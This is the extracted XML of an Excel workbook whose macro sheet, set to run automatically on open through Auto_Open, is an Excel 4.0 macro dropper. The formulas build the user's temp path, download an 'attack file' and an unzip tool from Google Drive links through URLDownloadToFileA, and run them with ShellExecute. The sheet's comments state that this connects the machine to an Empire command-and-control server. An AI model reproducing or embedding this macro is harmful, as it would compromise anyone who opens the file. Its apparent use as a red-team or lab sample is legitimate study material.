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a\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C12BC3FB-371A-4B15-95B2-39209318FEAB}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="24480" windowHeight="8760" xr2:uid="{F21B989F-B8FC-4826-8751-152CA08F5299}"/>
  </bookViews>
  <sheets>
    <sheet name="巨集1" sheetId="2" r:id="rId1"/>
    <sheet name="工作表1" sheetId="1" r:id="rId2"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm.Auto_Open">巨集1!$A$1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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="8" uniqueCount="8">
  <si>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Get the system username</t>
  </si>
  <si>
    <t>The location of %temp% folder</t>
  </si>
  <si>
    <t>Download the attack file from the google drive</t>
  </si>
  <si>
    <t>Download the unzip tool from the google drive</t>
  </si>
  <si>
    <t>Change the working dictionary to %temp% folder</t>
  </si>
  <si>
    <t>Get the file "launcher.bat"</t>
  </si>
  <si>
    <t>Execute the file "launcher.bat" -&gt; Connect to the empire server</t>
  </si>
  <si>
    <t>Stops all macros from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</si>
</sst>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963A072-6F0E-465A-9C8B-D26684FBCFED}">
  <dimension ref="A1:B11"/>
  <sheetViews>
    <sheetView showFormulas="1" tabSelected="1" workbookViewId="0">
      <selection activeCell="A7" sqref="A7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="64.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:2">
      <c r="A1" t="str">
        <f>MID(INFO("DIRECTORY"),10,LEN(INFO("DIRECTORY"))-LEN(MID(INFO("DIRECTORY"),FIND("\",INFO("DIRECTORY"),10),1000))-LEN("C:\Users\"))</f>
        <v>aaa</v>
      </c>
      <c r="B1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:2">
      <c r="A2" t="str">
        <f>"C:\Users\"&amp;A1&amp;"\AppData\Local\Temp\launcher.zip"</f>
        <v>C:\Users\aaa\AppData\Local\Temp\launcher.zip</v>
      </c>
    </row>
    <row r="3" spans="1:2">
      <c r="A3" t="str">
        <f>"C:\Users\"&amp;A1&amp;"\AppData\Local\Temp\unzip.exe"</f>
        <v>C:\Users\aaa\AppData\Local\Temp\unzip.exe</v>
      </c>
    </row>
    <row r="4" spans="1:2">
      <c r="A4" t="str">
        <f>"C:\Users\"&amp;A1&amp;"\AppData\Local\Temp\launcher.bat"</f>
        <v>C:\Users\aaa\AppData\Local\Temp\launcher.bat</v>
      </c>
    </row>
    <row r="5" spans="1:2">
      <c r="A5" t="str">
        <f>"C:\Users\"&amp;A1&amp;"\AppData\Local\Temp"</f>
        <v>C:\Users\aaa\AppData\Local\Temp</v>
      </c>
      <c r="B5" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:2">
      <c r="A6">
        <f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.google.com/uc?export=download&amp;id=1oZXa91NqXw5HWPDFGmMaA4dBlfWg1-mf",A2,0,0)</f>
        <v>0</v>
      </c>
      <c r="B6" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="7" spans="1:2">
      <c r="A7">
        <f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.google.com/uc?export=download&amp;id=1x47cLP7MpHSuQYMBinqONP2DMqLeIiYJ",A3,0,0)</f>
        <v>0</v>
      </c>
      <c r="B7" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="8" spans="1:2">
      <c r="A8" t="str">
        <f>DIRECTORY(A5)</f>
        <v>C:\Users\aaa\AppData\Local\Temp</v>
      </c>
      <c r="B8" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="9" spans="1:2">
      <c r="A9">
        <f>CALL("Shell32","ShellExecuteA","JJCCJJ",0,"open",A3,0,0)</f>
        <v>42</v>
      </c>
      <c r="B9" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="10" spans="1:2">
      <c r="A10">
        <f>CALL("Shell32","ShellExecuteA","JJCCJJ",0,"open",A4,0,0)</f>
        <v>2</v>
      </c>
      <c r="B10" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="11" spans="1:2">
      <c r="A11" t="b">
        <f>HALT()</f>
        <v>1</v>
      </c>
      <c r="B11" t="s">
        <v>7</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/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53FC9-2A15-432B-9DB2-78C126837186}">
  <sheetPr codeName="工作表1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工作表1</vt:lpstr>
      <vt:lpstr>巨集1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aaa</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-03-08T09:24:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-07T06:32:09Z</dcterms:modified>
</cp:coreProperties>
</file>